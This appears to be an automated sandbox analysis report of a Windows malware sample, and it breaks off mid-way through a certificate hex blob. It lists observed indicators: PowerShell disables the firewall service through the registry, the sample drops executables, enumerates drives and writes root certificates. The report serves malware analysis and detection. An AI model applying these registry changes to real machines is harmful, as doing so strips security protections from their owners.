Analysis
-
max time kernel
155s -
max time network
140s -
platform
windows10_x64 -
resource
win10-en-20211014 -
submitted
15-10-2021 13:53
Static task
static1
Behavioral task
behavioral1
Sample
211be6f6699092fb1e0de9ccc77a9d9f4e057be15906ff360fa479dec0ec4e33.exe
Resource
win10-en-20211014
General
-
Target
211be6f6699092fb1e0de9ccc77a9d9f4e057be15906ff360fa479dec0ec4e33.exe
-
Size
6.0MB
-
MD5
5a41f52a595d7b83c3576f09fb7736fa
-
SHA1
7c3420961acf1fc77533aec0d9e006316c69938f
-
SHA256
211be6f6699092fb1e0de9ccc77a9d9f4e057be15906ff360fa479dec0ec4e33
-
SHA512
890916f451bfbeb3d81be521da5184c5f3f912f13663d4e32fb06b56b015c7fd052d3d981f0d035a1f3b416d767bef647d641551f8b5c14ec5c5aed6dbeff548
Malware Config
Signatures
-
Modifies security service 2 TTPs 1 IoCs
Processes:
powershell.exedescription ioc process Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\MpsSvc\Start = "4" powershell.exe -
Downloads MZ/PE file
-
Executes dropped EXE 4 IoCs
Processes:
etoapp.exeUpSys.exeUpSys.exeUpSys.exepid process 2132 etoapp.exe 680 UpSys.exe 380 UpSys.exe 428 UpSys.exe -
Modifies Windows Firewall 1 TTPs
-
Loads dropped DLL 12 IoCs
Processes:
211be6f6699092fb1e0de9ccc77a9d9f4e057be15906ff360fa479dec0ec4e33.exeMsiExec.exeMsiExec.exeetoapp.exepid process 2336 211be6f6699092fb1e0de9ccc77a9d9f4e057be15906ff360fa479dec0ec4e33.exe 2336 211be6f6699092fb1e0de9ccc77a9d9f4e057be15906ff360fa479dec0ec4e33.exe 908 MsiExec.exe 908 MsiExec.exe 1168 MsiExec.exe 1168 MsiExec.exe 1168 MsiExec.exe 1168 MsiExec.exe 1168 MsiExec.exe 1168 MsiExec.exe 2336 211be6f6699092fb1e0de9ccc77a9d9f4e057be15906ff360fa479dec0ec4e33.exe 2132 etoapp.exe -
Enumerates connected drives 3 TTPs 64 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
Processes:
211be6f6699092fb1e0de9ccc77a9d9f4e057be15906ff360fa479dec0ec4e33.exemsiexec.exemsiexec.exedescription ioc process File opened (read-only) \??\B: 211be6f6699092fb1e0de9ccc77a9d9f4e057be15906ff360fa479dec0ec4e33.exe File opened (read-only) \??\H: 211be6f6699092fb1e0de9ccc77a9d9f4e057be15906ff360fa479dec0ec4e33.exe File opened (read-only) \??\J: 211be6f6699092fb1e0de9ccc77a9d9f4e057be15906ff360fa479dec0ec4e33.exe File opened (read-only) \??\E: msiexec.exe File opened (read-only) \??\N: msiexec.exe File opened (read-only) \??\E: 211be6f6699092fb1e0de9ccc77a9d9f4e057be15906ff360fa479dec0ec4e33.exe File opened (read-only) \??\R: 211be6f6699092fb1e0de9ccc77a9d9f4e057be15906ff360fa479dec0ec4e33.exe File opened (read-only) \??\A: msiexec.exe File opened (read-only) \??\W: msiexec.exe File opened (read-only) \??\S: msiexec.exe File opened (read-only) \??\M: msiexec.exe File opened (read-only) \??\Q: msiexec.exe File opened (read-only) \??\G: 211be6f6699092fb1e0de9ccc77a9d9f4e057be15906ff360fa479dec0ec4e33.exe File opened (read-only) \??\P: 211be6f6699092fb1e0de9ccc77a9d9f4e057be15906ff360fa479dec0ec4e33.exe File opened (read-only) \??\T: 211be6f6699092fb1e0de9ccc77a9d9f4e057be15906ff360fa479dec0ec4e33.exe File opened (read-only) \??\B: msiexec.exe File opened (read-only) \??\L: msiexec.exe File opened (read-only) \??\E: msiexec.exe File opened (read-only) \??\R: msiexec.exe File opened (read-only) \??\K: msiexec.exe File opened (read-only) \??\X: msiexec.exe File opened (read-only) \??\Z: msiexec.exe File opened (read-only) \??\T: msiexec.exe File opened (read-only) \??\U: msiexec.exe File opened (read-only) \??\S: msiexec.exe File opened (read-only) \??\U: msiexec.exe File opened (read-only) \??\A: 211be6f6699092fb1e0de9ccc77a9d9f4e057be15906ff360fa479dec0ec4e33.exe File opened (read-only) \??\F: 211be6f6699092fb1e0de9ccc77a9d9f4e057be15906ff360fa479dec0ec4e33.exe File opened (read-only) \??\I: 211be6f6699092fb1e0de9ccc77a9d9f4e057be15906ff360fa479dec0ec4e33.exe File opened (read-only) \??\K: 211be6f6699092fb1e0de9ccc77a9d9f4e057be15906ff360fa479dec0ec4e33.exe File opened (read-only) \??\X: 211be6f6699092fb1e0de9ccc77a9d9f4e057be15906ff360fa479dec0ec4e33.exe File opened (read-only) \??\H: msiexec.exe File opened (read-only) \??\Y: msiexec.exe File opened (read-only) \??\M: 211be6f6699092fb1e0de9ccc77a9d9f4e057be15906ff360fa479dec0ec4e33.exe File opened (read-only) \??\I: msiexec.exe File opened (read-only) \??\O: msiexec.exe File opened (read-only) \??\J: msiexec.exe File opened (read-only) \??\O: msiexec.exe File opened (read-only) \??\V: msiexec.exe File opened (read-only) \??\S: 211be6f6699092fb1e0de9ccc77a9d9f4e057be15906ff360fa479dec0ec4e33.exe File opened (read-only) \??\N: msiexec.exe File opened (read-only) \??\V: msiexec.exe File opened (read-only) \??\Y: msiexec.exe File opened (read-only) \??\I: msiexec.exe File opened (read-only) \??\K: msiexec.exe File opened (read-only) \??\N: 211be6f6699092fb1e0de9ccc77a9d9f4e057be15906ff360fa479dec0ec4e33.exe File opened (read-only) \??\Y: 211be6f6699092fb1e0de9ccc77a9d9f4e057be15906ff360fa479dec0ec4e33.exe File opened (read-only) \??\M: msiexec.exe File opened (read-only) \??\R: msiexec.exe File opened (read-only) \??\B: msiexec.exe File opened (read-only) \??\L: msiexec.exe File opened (read-only) \??\O: 211be6f6699092fb1e0de9ccc77a9d9f4e057be15906ff360fa479dec0ec4e33.exe File opened (read-only) \??\Q: 211be6f6699092fb1e0de9ccc77a9d9f4e057be15906ff360fa479dec0ec4e33.exe File opened (read-only) \??\Z: 211be6f6699092fb1e0de9ccc77a9d9f4e057be15906ff360fa479dec0ec4e33.exe File opened (read-only) \??\A: msiexec.exe File opened (read-only) \??\T: msiexec.exe File opened (read-only) \??\L: 211be6f6699092fb1e0de9ccc77a9d9f4e057be15906ff360fa479dec0ec4e33.exe File opened (read-only) \??\U: 211be6f6699092fb1e0de9ccc77a9d9f4e057be15906ff360fa479dec0ec4e33.exe File opened (read-only) \??\G: msiexec.exe File opened (read-only) \??\H: msiexec.exe File opened (read-only) \??\P: msiexec.exe File opened (read-only) \??\Q: msiexec.exe File opened (read-only) \??\Z: msiexec.exe File opened (read-only) \??\W: 211be6f6699092fb1e0de9ccc77a9d9f4e057be15906ff360fa479dec0ec4e33.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Drops file in System32 directory 1 IoCs
Processes:
powershell.exedescription ioc process File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache powershell.exe -
Drops file in Windows directory 13 IoCs
Processes:
msiexec.exedescription ioc process File opened for modification C:\Windows\Installer\MSI997.tmp msiexec.exe File created C:\Windows\Installer\f75f84b.msi msiexec.exe File opened for modification C:\Windows\Installer\f75f84b.msi msiexec.exe File opened for modification C:\Windows\Installer\MSIFCEF.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSIFE19.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSIFF43.tmp msiexec.exe File created C:\Windows\Installer\inprogressinstallinfo.ipi msiexec.exe File created C:\Windows\Installer\SourceHash{C858BEE1-39B7-49DA-9974-0F78D311CE8D} msiexec.exe File opened for modification C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log msiexec.exe File opened for modification C:\Windows\Installer\MSIFE97.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI1.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI159.tmp msiexec.exe File opened for modification C:\Windows\Installer\ msiexec.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Modifies data under HKEY_USERS 52 IoCs
Processes:
powershell.exeUpSys.exedescription ioc process Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" UpSys.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" UpSys.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" UpSys.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" UpSys.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ UpSys.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.exe -
Processes:
211be6f6699092fb1e0de9ccc77a9d9f4e057be15906ff360fa479dec0ec4e33.exeetoapp.exedescription ioc process Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 190000000100000010000000749966cecc95c1874194ca7203f9b6200300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d431d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0b000000010000001200000044006900670069004300650072007400000014000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f6200000001000000200000003e9099b5015e8f486c00bcea9d111ee721faba355a89bcf1df69561e3dc6325c090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b06010505070308530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa62000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2 211be6f6699092fb1e0de9ccc77a9d9f4e057be15906ff360fa479dec0ec4e33.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 04000000010000001000000087ce0b7b2a0e4900e158719b37a893720f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa6530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b060105050703086200000001000000200000003e9099b5015e8f486c00bcea9d111ee721faba355a89bcf1df69561e3dc6325c14000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f0b00000001000000120000004400690067006900430065007200740000001d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d43190000000100000010000000749966cecc95c1874194ca7203f9b6202000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2 211be6f6699092fb1e0de9ccc77a9d9f4e057be15906ff360fa479dec0ec4e33.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 5c000000010000000400000000080000190000000100000010000000749966cecc95c1874194ca7203f9b6200300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d431d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0b000000010000001200000044006900670069004300650072007400000014000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f6200000001000000200000003e9099b5015e8f486c00bcea9d111ee721faba355a89bcf1df69561e3dc6325c090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b06010505070308530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa604000000010000001000000087ce0b7b2a0e4900e158719b37a893722000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2 211be6f6699092fb1e0de9ccc77a9d9f4e057be15906ff360fa479dec0ec4e33.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 etoapp.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 5c0000000100000004000000000800000f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e etoapp.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43 211be6f6699092fb1e0de9ccc77a9d9f4e057be15906ff360fa479dec0ec4e33.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 0f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa6530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b060105050703086200000001000000200000003e9099b5015e8f486c00bcea9d111ee721faba355a89bcf1df69561e3dc6325c14000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f0b00000001000000120000004400690067006900430065007200740000001d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d432000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010